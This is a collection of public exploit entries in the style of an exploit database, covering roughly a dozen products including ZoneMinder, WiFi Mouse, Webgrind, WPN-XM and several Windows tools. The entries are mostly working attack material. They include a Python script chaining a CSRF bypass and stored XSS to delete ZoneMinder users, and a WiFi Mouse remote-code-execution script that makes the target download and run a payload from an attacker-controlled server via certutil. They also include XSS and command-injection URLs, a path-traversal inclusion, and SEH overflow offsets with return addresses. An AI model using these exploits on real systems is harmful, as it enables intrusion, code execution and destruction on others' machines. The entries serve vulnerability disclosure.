# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: Sinem Şahin # Date: 2022-10-08 # Vendor Homepage: https://www.csphere.eu/ # Version: 2011.4 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872 2- Write XSS Payload into the username of the buddy list create. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script> Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md

# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>" #Request to login and get the response headers loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession) #Request using response headers to obtain CSRF value csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log") while True: #XSS Request xssUrl = "http://"+options.ip+"/zm/index.php" xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession} xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"} xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData) print("Injecting payload: " + response.text) time.sleep(1)

# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE) # Date: 13-10-2022 # Author: Payal # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.2 # Tested on: Windows 10 Pro Build 21H2 # Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAMfrom time import sleepimport sysimport string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3]except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()

# Exploit Title: Grafana <=6.2.4 - HTML Injection # Date: 30-06-2019 # Exploit Author: SimranJeet Singh # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download/6.2.4 # Version: 6.2.4 # CVE : CVE-2019-13068 The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field) Payload used - <img src="[image_URL]"><h1>Hello</h1>

# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://github.com/jokkedk/webgrind/ # Software Link : http://github.com/jokkedk/webgrind/ # Tested Version: 1.1 # Tested on: Windows 10 using XAMPP # Vulnerability Type: Remote Command Execution (RCE) CVSS v3: 9.8 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-434 Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter. Proof of concept: http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph And the calc.exe opens. Note: 0'&calc.exe&', & char is neccesary to execute the command. # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Webgrind v1.1 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php, in file parameter. Proof of concept: http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E Response: ... <title> webgrind - fileviewer: </title><script>alert(1);</script><title> </title> <script type="text/javascript" charset="utf-8">

# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-13 # Vendor Homepage: http://wpn-xm.org/ # Software Link : https://github.com/WPN-XM/WPN-XM/ # Tested Version: 0.8.6 # Tested on: Windows 10 using XAMPP # Vulnerability Type: Local File Inclusion (LFI) & directory traversal (path traversal) CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello (without php) GET request. Proof of concept: To detect: http://localhost/tools/webinterface/index.php?page=) The parameter "page" can be modified and load a php file in the server. Example, In C:\:hello.php with this content: C:\>type hello.php <?php echo "HELLO FROM C:\\hello.php"; ?> To Get hello.php in c:\ : http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello Note: hello without ".php". And you can see the PHP message into the browser at the start. Response: HELLO FROM C:\hello.php<!DOCTYPE html> <html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WP?-XM Server Stack for Windows - 0.8.6</title> <meta name="description" content="WP?-XM Server Stack for Windows - Webinterface."> <meta name="author" content="Jens-André Koch" /> <link rel="shortcut icon" href="favicon.ico" /> # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /tools/webinterface/index.php, in multiple parameters. Proof of concept: http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E

# Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 10-13-2022 # Vendor Homepage: https://pjo2.github.io/tftpd64/ # Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe # Tested Version: 4.60 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto C:\>sc qc Tftpd32_svc NOMBRE_SERVICIO: Tftpd32_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Tftpd32 service edition DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-09 # Vendor Homepage: http://frhed.sourceforge.net/ # Software Link : http://frhed.sourceforge.net/ # Tested Version: 1.6.0 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Buffer overflow controlling the Structured Exception Handler (SEH) records in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open Frhed.exe from command line with a large string in Arguments, more than 494 chars: File '<Frhed_PATH>\Frhed.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...' SEH chain of main thread Address SE handler 0018FC8C 41367141 35714134 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic data after the handler 0BADF00D ------------------------------ 'Targets' => [ [ '<fill in the OS/app version here>', { 'Ret' => 0x00401ba7, # pop ecx # pop ecx # ret - Frhed.exe (change this value by other without \x00) 'Offset' => 494 } ], ],

# Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-09 # Vendor Homepage: http://www.explorerplusplus.com/ # Software Link : http://www.explorerplusplus.com/ # Tested Version: 1.3.5.531 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Buffer overflow controlling the Structured Exception Handler (SEH) records in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open Explorer32++.exe from command line with a large string in Arguments, more than 396 chars: File '<Explorer++_PATH>\Explorer32++.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...' SEH chain of main thread Address SE handler 0018FB14 00690041 00370069 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic data after the handler

# Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.angusj.com/resourcehacker/ # Software Link : http://www.angusj.com/resourcehacker/ # Tested Version: 3.6.0.92 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Heap-based buffer overflow controlling the Structured Exception Handler (SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open ResHacker.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\ResourceHacker36\ResHacker.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...' SEH chain of main thread Address SE handler 0018FCB4 316A4130 6A413969 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic data after the handler 0BADF00D ------------------------------ 'Targets' => [ [ '<fill in the OS/app version here>', { 'Ret' => 0x00426446, # pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona, with a not \x00 ret address) 'Offset' => 268 } ], ],

# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com # Software Link : http://www.bpsoft.com, http://www.hexworkshop.com # Tested Version: v6.7 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Hex Workshop v6.7 is vulnerable to denial of service via a command line file arguments and control the Structured Exception Handler (SEH) records. Proof of concept: Open HWorks32.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\Hex Workshop\HWorks32.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..." 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic data after the handler The application crash.

# Exploit Title: Scdbg 1.0 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2021-06-13 # Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152 # Software Link : https://github.com/dzzie/VS_LIBEMU # Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45 # Tested on: Windows 7, 10 CVSS v3: 7.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CWE: CWE-400 Vulnerability description: scdbg.exe (all versions) is affected by a Denial of Service vulnerability that occurs when you use the /foff parameter or not with a specific shellcode causing it to shutdown. Any malware could use this option to evade the scan. Proof of concept: Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin #!/usr/bin/env python crash = "\x90\xF6\x84\x01\x90\x90\x90\x90" f = open ("scdbg_crash.bin", "w") f.write(crash) f.close() You can use gui_launcher.exe and check "Start offset 0x": 1 or directly without check [image: image.png]